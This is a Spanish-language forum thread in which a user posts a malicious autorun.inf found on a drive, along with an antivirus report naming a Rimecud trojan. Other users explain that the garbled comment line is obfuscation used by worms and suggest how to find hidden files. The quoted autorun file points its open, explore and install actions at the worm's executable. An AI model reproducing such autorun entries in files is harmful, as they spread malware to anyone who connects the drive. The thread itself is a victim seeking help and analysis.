extraño autorun

Iniciado por morty2, 31 Diciembre 2010, 19:12 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

morty2

31 Diciembre 2010, 19:12 PM
hola amigos, intentaron infectarme con esto, que les parece??




[autorun]
shellexecute=nocasmilimoj\\\nenijerano.exe
action=Open folder to see files using Windows Explorer
USEAUTOPLAY=1
#djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô
open=nocasmilimoj\\\nenijerano.exe
icon=shell32.dll,4
shell\\\Install\\\command=nocasmilimoj\\\nenijerano.exe
shell\\\open\\\command=nocasmilimoj\\\nenijerano.exe
shell\\\explore\\\command=nocasmilimoj\\\nenijerano.exe
Shell\\\open\\\command=nocasmilimoj\\\nenijerano.exe


habia visto bastantes autorun antes pero nunca ninguno con nada parecido a

#djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô

alguien que sepa me lo podria explicar??
gracias de antemano

morty2

#1
31 Diciembre 2010, 19:55 PM
encontré el archivo y me da ésto.....


File Info

Report date: 2010-12-31 19:53:34 (GMT 1)
File name: nenijerano-exe
File size: 206336 bytes
MD5 Hash: 60aedbc78bfc3285169cc78d73a591aa
SHA1 Hash: a0f2c2bd8f3594726d0ebb0c42c71df080541965
Detection rate: 5 on 16 (31%)
Status: INFECTED

Detections

a-squared - Trojan.Win32.Rimecud!IK
Avast -
AVG -
Avira AntiVir -
BitDefender - Gen:Variant.Kazy.6906
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 - Trojan.Win32.Rimecud
Kaspersky -
NOD32 -
Panda - Suspicious file
TrendMicro -
VBA32 - BScope.Trojan.MTA.0904
VirusBuster -

Scan report generated by
NoVirusThanks.org

[Zero]

#2
31 Diciembre 2010, 20:07 PM
La cadena rara es para ofuscar, eso vuelve el autorun menos detectable. Lo usan muchos gusanos:
Código [Seleccionar]
http://www.infospyware.eu/conficker-autorun.html

Saludos

BlackStack

"El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche

morty2

#3
31 Diciembre 2010, 20:40 PM
gracias amigo.

ahora el problema es que el autorun anda por ahi y no lo encuentro!!

skapunky

#4
1 Enero 2011, 02:19 AM
Debe estar oculto, mira en opciones y pon que los archivos ocultos se muestren, si no sabes como hacerlo aquí te dejo una pequeña guia:

Guia para ver archivos ocultos
Killtrojan Syslog v1.44: ENTRAR

Karcrack

#5
1 Enero 2011, 14:23 PM

(PGP ID)

morty2

#6
1 Enero 2011, 20:30 PM
Esta ocultado con el comando attrib de msdos, por eso no se veía ni aun poniendo que se muestren los archivos ocultos. Eso lo e solucionado, incluso había creado claves de registro el cabr..., jeje..
Imprimir
Ir Arriba Páginas1
Acciones del Usuario